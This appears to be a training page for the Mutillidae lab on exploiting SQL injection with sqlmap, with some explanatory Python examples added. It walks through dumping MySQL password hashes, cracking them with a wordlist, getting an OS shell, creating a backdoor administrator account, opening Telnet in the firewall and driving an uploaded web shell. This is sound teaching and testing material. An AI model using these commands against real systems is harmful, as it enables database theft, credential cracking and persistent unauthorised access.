SQL Injection with SQLMap


Overview

Note: See the SQL injection hint page for help specific to SQL injection. This page is dedicated to the tool SQLMap which can be helpful to evaluate the risk exposed by SQL injection vulnerabilities.

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws. It is the most widely used open-source tool for the job: it fingerprints the back-end DBMS, supports boolean-based blind, time-based blind, error-based, UNION query and stacked-query injection, and can enumerate and dump data once an injection point is confirmed.

Running SQLMAP Help

Note: On Kali Linux, SQLMap is found in /usr/share/sqlmap/

sqlmap --help     Basic help (common options)
sqlmap -hh        Advanced help (every option, including enumeration and takeover switches)

Running SQLMAP "Manually"

sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner

--url is the target, --data is the POST body (sqlmap tests each parameter in it, as well as the page parameter in the query string), and --banner asks sqlmap to retrieve the DBMS version banner once it has found an injection.

Capturing Request To Pass To SQLMAP

Note: Save the raw HTTP request (for example as captured by an intercepting proxy) to a file such as ~/engagements/sqlmap/login.php.request. The -r switch takes the file path; sqlmap reads the method, URL, headers, cookies and body from the file, so nothing has to be retyped on the command line.

URL: http://192.168.56.102/mutillidae/index.php?page=login.php

Request:
POST /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.56.102/mutillidae/index.php?page=login.php
Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

username=asdf&password=asdf&login-php-submit-button=Login

Running SQLMAP with "auto-parse"

sqlmap -r ~/engagements/sqlmap/login.php.request <options>
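To make it concrete what sqlmap takes from the -r file, here is an added example (not part of this page and not sqlmap's own code) that parses the captured request above into the pieces sqlmap works with and lists which parameters become injection candidates at each --level. The request text is the one from this page, embedded inline so the script runs offline; the "place:name" labels for candidates are this example's own naming.

```python
"""Parse a raw HTTP request file of the kind passed to sqlmap -r.

Added example, not from the original page or from sqlmap: it shows what
sqlmap extracts from the file (method, URL, headers, cookie and body
parameters) and which of those become injection candidates at a given
--level. The request below is the one captured on this page.
"""
from urllib.parse import parse_qsl, urlsplit

# Sample request (copied from the page); the blank line separates the
# headers from the body, exactly as sqlmap expects in the -r file.
SAMPLE_REQUEST = """\
POST /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.56.102/mutillidae/index.php?page=login.php
Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

username=asdf&password=asdf&login-php-submit-button=Login
"""


def parse_request(raw: str, scheme: str = "http") -> dict:
    """Split a raw request into the pieces sqlmap works with."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        # split on the first colon only; values such as the Referer URL
        # or "rv:17.0" in the User-Agent contain colons themselves
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    # sqlmap rebuilds the full URL from the Host header and request target
    url = f"{scheme}://{headers['Host']}{target}"
    cookies = {}
    for pair in headers.get("Cookie", "").split(";"):
        if "=" in pair:
            k, _, v = pair.strip().partition("=")
            cookies[k] = v
    body = body.strip()
    declared = int(headers.get("Content-Length", len(body)))
    return {
        "method": method,
        "url": url,
        "headers": headers,
        "get": dict(parse_qsl(urlsplit(url).query, keep_blank_values=True)),
        "post": dict(parse_qsl(body, keep_blank_values=True)),
        "cookie": cookies,
        # a hand-edited body often leaves a stale Content-Length behind
        "content_length_ok": declared == len(body.encode()),
    }


def injection_candidates(req: dict, level: int = 1) -> list:
    """Parameters sqlmap would test at the given --level.

    Level 1 tests GET and POST parameters, level 2 adds Cookie values and
    level 3 adds the User-Agent and Referer headers (sqlmap's documented
    behaviour). The 'place:name' labels are this example's own.
    """
    cands = [f"GET:{p}" for p in req["get"]] + [f"POST:{p}" for p in req["post"]]
    if level >= 2:
        cands += [f"Cookie:{c}" for c in req["cookie"]]
    if level >= 3:
        cands += [f"Header:{h}" for h in ("User-Agent", "Referer") if h in req["headers"]]
    return cands


if __name__ == "__main__":
    req = parse_request(SAMPLE_REQUEST)
    print(req["method"], req["url"], "Content-Length ok:", req["content_length_ok"])
    for lvl in (1, 2, 3):
        print(f"--level={lvl}:", ", ".join(injection_candidates(req, lvl)))
```

Note that at the default --level=1 the PHPSESSID cookie and the headers are never tested; if the application uses a cookie value in a query, run with --level=2 or higher, or mark the spot explicitly with the * injection marker inside the request file.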

Running SQLMAP with various features

sqlmap -r ~/engagements/sqlmap/login.php.request <options>
--banner            Retrieve DBMS banner
    web server operating system: Windows
    web application technology: PHP 5.4.4, Apache 2.4.2
    back-end DBMS: MySQL 5.0
    banner: '5.5.25a'

--fingerprint       Perform an extensive DBMS version fingerprint
    web server operating system: Windows
    web application technology: PHP 5.4.4, Apache 2.4.2
    back-end DBMS: active fingerprint: MySQL >= 5.5.0

--current-user      Retrieve DBMS current user
--current-db        Retrieve DBMS current database
--hostname          Retrieve DBMS server hostname
--is-dba            Detect if the DBMS current user is DBA
    current user: 'root@localhost'
    current database: 'nowasp'
    current user is DBA: True
    hostname: 'mutillid-7se1xr'

The application connects as root with DBA rights. That single fact turns an injection into full compromise: with DBA privileges sqlmap can read and write files on the server (--file-read, --file-write) and attempt --os-shell.

--users             Enumerate DBMS users
--passwords         Enumerate DBMS users password hashes
    database management system users
    [*] ''@'localhost'
    [*] 'pma'@'localhost'
    [*] 'root'@'linux'
    [*] 'root'@'localhost'

--dbs               Enumerate DBMS databases
    available databases[10]:
    [*] cdcol
    [*] information_schema
    [*] mysql
    [*] nowasp
    [*] owasp10
    [*] owasp13
    [*] performance_schema
    [*] phpmyadmin
    [*] test
    [*] webauth

Enumerate DBMS database tables, columns, structure (schema)
--tables            Enumerate DBMS database tables
--columns           Enumerate DBMS database table columns
--schema            Enumerate DBMS schema
--count             Retrieve number of entries for table(s)
--exclude-sysdbs    Exclude DBMS system databases when enumerating tables
-D DB               DBMS database to enumerate
-T TBL              DBMS database table to enumerate
-C COL              DBMS database table column to enumerate
-U USER             DBMS user to enumerate

Extracting data

--dump              Dump DBMS database table entries
--dump-all          Dump all DBMS databases tables entries
-D DB               DBMS database to enumerate
-T TBL              DBMS database table to enumerate
-C COL              DBMS database table column to enumerate
-U USER             DBMS user to enumerate
--exclude-sysdbs    Exclude DBMS system databases when enumerating tables
--start=LIMITSTART  First query output entry to retrieve
--stop=LIMITSTOP    Last query output entry to retrieve
--sql-query=QUERY   SQL statement to be executed
--sql-shell         Prompt for an interactive SQL shell

Listing columns from tables

sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns
sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns
sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'"

--columns reads the table definition from information_schema. --common-columns instead guesses column names from a built-in wordlist; it is the fallback when information_schema does not exist (MySQL before 5.0) or cannot be read. The --sql-query form does by hand what --columns does for you and is useful when you want to control the exact query. Output of the third command:

select column_name from information_schema.columns where table_name = 'user' [42]:
[*] Alter_priv
[*] Alter_routine_priv
[*] authentication_string
[*] Create_priv
[*] Create_routine_priv
[*] Create_tablespace_priv
[*] Create_tmp_table_priv
[*] Create_user_priv
[*] Create_view_priv
[*] Delete_priv
[*] Drop_priv
[*] Event_priv
[*] Execute_priv
[*] File_priv
[*] Grant_priv
[*] Host
[*] Index_priv
[*] Insert_priv
[*] Lock_tables_priv
[*] max_connections
[*] max_questions
[*] max_updates
[*] max_user_connections
[*] Password
[*] plugin
[*] Process_priv
[*] References_priv
[*] Reload_priv
[*] Repl_client_priv
[*] Repl_slave_priv
[*] Select_priv
[*] Show_db_priv
[*] Show_view_priv
[*] Shutdown_priv
[*] ssl_cipher
[*] ssl_type
[*] Super_priv
[*] Trigger_priv
[*] Update_priv
[*] User
[*] x509_issuer
[*] x509_subject

Advanced: Modifying injections

The login page builds its query by concatenating the submitted values into a string, so the payload lands inside the single quotes around the username:

SELECT * FROM accounts WHERE username='' AND password=''

--prefix=PREFIX     Injection payload prefix string
--suffix=SUFFIX     Injection payload suffix string

sqlmap -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner

sqlmap sends prefix + payload + suffix as the parameter value. The prefix therefore has to close whatever context the value lands in (here a string literal, so it must end with a single quote) and the suffix has to neutralise the remainder of the original query (a comment; on MySQL "-- " needs the trailing space). In the command above only the trailing quote of the prefix does any work, since everything before it is sent as ordinary string content. Setting the boundaries by hand is for the cases where sqlmap's automatic detection fails, for example a value inside parentheses or a nested query.
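The following added example (not from this page and not sqlmap's code) reproduces the login query above as a template, wraps a payload with a prefix and suffix the way sqlmap does, and runs the result against an in-memory SQLite table so you can see which boundary pairs produce valid SQL and which make sqlmap's TRUE and FALSE probes distinguishable. The accounts table, its rows and the minimal boundary pair (a quote and a "-- " comment) are constructed for the demonstration; a space is inserted between prefix and payload for readability.

```python
"""How --prefix and --suffix place a payload inside the target query.

Added example, not part of the page or of sqlmap: the page's login query
is a template, a payload is wrapped with prefix/suffix, and the composed
SQL is executed against a throwaway SQLite table (constructed here) to
show the effect of each boundary choice.
"""
import sqlite3

# The query the login form builds (from the page); values are
# concatenated in, which is the injection.
TEMPLATE = "SELECT * FROM accounts WHERE username='{username}' AND password='{password}'"


def wrap(payload: str, prefix: str, suffix: str) -> str:
    """sqlmap sends prefix + payload + suffix as the parameter value."""
    return f"{prefix} {payload}{suffix}"


def build_query(username: str, password: str = "asdf") -> str:
    """The vulnerable concatenation: the value is dropped straight in."""
    return TEMPLATE.format(username=username, password=password)


def run(query: str):
    """Execute against a constructed table; return row count or the error."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    con.executemany("INSERT INTO accounts VALUES (?, ?)",
                    [("admin", "s3cret"), ("bob", "hunter2")])
    try:
        return len(con.execute(query).fetchall())
    except sqlite3.Error as e:
        return f"error: {e}"
    finally:
        con.close()


def probe(prefix: str, suffix: str):
    """Boolean-based check in miniature: a TRUE payload and a FALSE
    payload must produce different results or the injection is blind
    to the difference. Returns (true_result, false_result)."""
    true_q = build_query(wrap("OR 1=1", prefix, suffix))
    false_q = build_query(wrap("OR 1=2", prefix, suffix))
    return run(true_q), run(false_q)


if __name__ == "__main__":
    for prefix, suffix in [("", ""), ("'", ""), ("'", "-- "),
                           ("SELECT * FROM accounts WHERE username='", "-- ")]:
        print(repr(prefix), repr(suffix), "->", probe(prefix, suffix))
        print("   ", build_query(wrap("OR 1=1", prefix, suffix)))
```

Without a closing quote the payload stays inside the string and both probes return nothing; a quote without a comment leaves the trailing `' AND password='asdf'` dangling and the DBMS rejects the statement; only the matched pair yields (all rows, no rows), which is the difference sqlmap keys on. The page's long prefix behaves exactly like the bare quote because everything before its final quote is just string content.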

Advanced: Dealing with inconsistent results

sqlmap retrieves results one row at a time: for blind techniques it asks for row N with a LIMIT clause and walks N upward. A query with no ORDER BY returns rows in whatever order the storage engine happens to produce, and that order is not guaranteed to be the same from one statement to the next, so the same row can come back twice while another is never seen. Forcing an order makes every call agree on which row is row N:

select User, Password from mysql.user

versus

sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc"

Output (this run also selected Host and authentication_string):

select User, Password, Host, authentication_string from mysql.user order by User desc [9]:
[*] root, , localhost,
[*] root, , linux,
[*] pma, , localhost,
[*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost,
[*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost,
[*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost,
[*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost,
[*] , , localhost,
[*] , , linux,

Two things in this output are findings in their own right before any cracking: both root accounts and pma have an empty password, and two anonymous ('') accounts exist. On this MySQL 5.5 target the hash is in the Password column; from MySQL 5.7 it lives in authentication_string instead, which is why selecting both columns is a good habit.

Cracking MySQL Password Hashes

MySQL 4.1 and later store PASSWORD() hashes as an asterisk followed by 40 upper-case hex digits: SHA1(SHA1(password)), with no salt. John the Ripper calls this format mysql-sha1 (--format=mysql is the older 16-hex-digit pre-4.1 hash, and hashcat mode 300 is the same algorithm). Because it is unsalted and only two SHA1 rounds, wordlist attacks are fast and identical passwords produce identical hashes across users and servers.

John the Ripper command line (BackTrack path; on Kali john is on the PATH):

/pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes

Password hashes in the user:hash layout john expects (/tmp/mysql.hashes):

Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5
Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032
Patches:*2027D9391E714343187E07ACB41AE8925F30737E
Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B
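To show what john is actually doing with --format=mysql-sha1, here is an added example (not from this page and not John the Ripper's code) that computes the MySQL 4.1+ hash and runs a small wordlist against a hash file in the user:hash layout shown above. The wordlist and the admin, dba, svc and root lines are constructed for the demonstration (the admin hash is MySQL's published value for the password "password"); the Simba, Rocky, Patches and Happy lines are the hashes from this page and are simply tried, with no claim about what they contain.

```python
"""MySQL 4.1+ password hashes and a wordlist attack against them.

Added example, not part of the page or of John the Ripper. The hash john
calls mysql-sha1 is '*' + upper-case hex of SHA1(SHA1(password)); this
script computes it and checks a constructed wordlist against a hash file
in the same user:hash layout fed to john above.
"""
import hashlib


def mysql41_hash(password: str) -> str:
    """Equivalent of MySQL's PASSWORD() for 4.1+ accounts (unsalted)."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# Constructed hash file: admin uses MySQL's documented hash of "password",
# dba and svc are generated here, root has an empty hash (no password set),
# and the last four lines are the hashes shown on this page.
HASH_FILE = f"""\
admin:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
dba:{mysql41_hash('Summer2013!')}
svc:{mysql41_hash('correct horse battery staple')}
root:
Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5
Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032
Patches:*2027D9391E714343187E07ACB41AE8925F30737E
Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B
"""

# Constructed wordlist standing in for john's password.lst
WORDLIST = ["123456", "password", "toor", "Summer2013!", "letmein", "qwerty"]


def parse_hash_file(text: str) -> dict:
    """user:hash lines; an empty hash is kept because it is itself a finding."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, h = line.partition(":")
        entries[user] = h.strip()
    return entries


def crack(entries: dict, wordlist) -> dict:
    """Return {user: password}; '' for accounts with an empty hash (they
    log in without one), None when the wordlist did not contain it.

    The hashes of the whole wordlist are computed once and looked up per
    user, which is what makes unsalted hashes cheap to attack in bulk."""
    candidates = {mysql41_hash(w): w for w in wordlist}
    result = {}
    for user, h in entries.items():
        result[user] = "" if h == "" else candidates.get(h.upper())
    return result


if __name__ == "__main__":
    entries = parse_hash_file(HASH_FILE)
    # john also tries the user name itself; emulate that simple rule here
    words = WORDLIST + [u.lower() for u in entries if u]
    for user, pw in crack(entries, words).items():
        state = "EMPTY PASSWORD" if pw == "" else (pw if pw else "not cracked")
        print(f"{user:8s} {state}")
```

The empty root hash is reported as its own result rather than skipped: an account that needs no password is worse than one with a weak hash, and it is easy to lose in a cracking report that only lists hits.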

Understanding sqlmap O/S Shell

Watch the traffic while sqlmap's --os-shell sets itself up:

tcpdump -i eth1 -vvv -X

sqlmap works in two stages: a 1st stage uploader (a small page written into the web root through the injection, which then accepts a file upload) and a 2nd stage command shell page that executes whatever command is passed to it. The commands below were then run through that shell on the Windows target to obtain a persistent login: they add a local administrator named root with password toor, enable the Telnet service and open TCP/23 in the firewall only to the attacking host (192.168.56.101):

sc query state= all
sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr
net user root toor /add
net localgroup TelnetClients /add
net localgroup Administrators root /add
net localgroup TelnetClients root /add
netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101

Every one of these changes persists after the engagement. Record them and remove the account, the group, the service start type and the firewall rule during clean-up.

Interacting Directly with sqlmap O/S Shell Backdoor

sqlmap leaves its 2nd stage page in the web root under a temporary file name (it prints the name and URL when --os-shell starts). The page takes the command in the cmd parameter, so it can be driven from a browser or curl without sqlmap:

http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101

Remove the uploaded files when finished; anyone who finds them has the same unauthenticated shell on the server.

Direct connection to the database

With valid credentials sqlmap can talk to the DBMS directly (-d) instead of going through the web application, which is useful once an empty or cracked password is known (above, root has no password). The mysql:// scheme needs the PyMySQL module.

Installing the PyMySQL dependency:

git clone https://github.com/petehunt/PyMySQL/
cd PyMySQL
python setup.py install
cd ..
rm -rf PyMySQL

(Current sqlmap releases can use the package from PyPI instead: pip install pymysql.)

Connecting as root with an empty password to the nowasp database (this target listens on 5123 rather than the default 3306):

sqlmap -d mysql://root:""@192.168.56.102:5123/nowasp

Videos


Automate SQL Injection using sqlmap
Basics of SQL Injection Timing Attacks
Introduction to Union-Based SQL Injection
Basics of Inserting Data with SQL Injection
Inject Web Shell Backdoor via SQL Injection
Basics of using SQL Injection to Read Files
Basics of using sqlmap - ISSA KY Workshop - February 2013
Introduction to SQL Injection for Beginners
Introduction to SQL Injection with SQLMap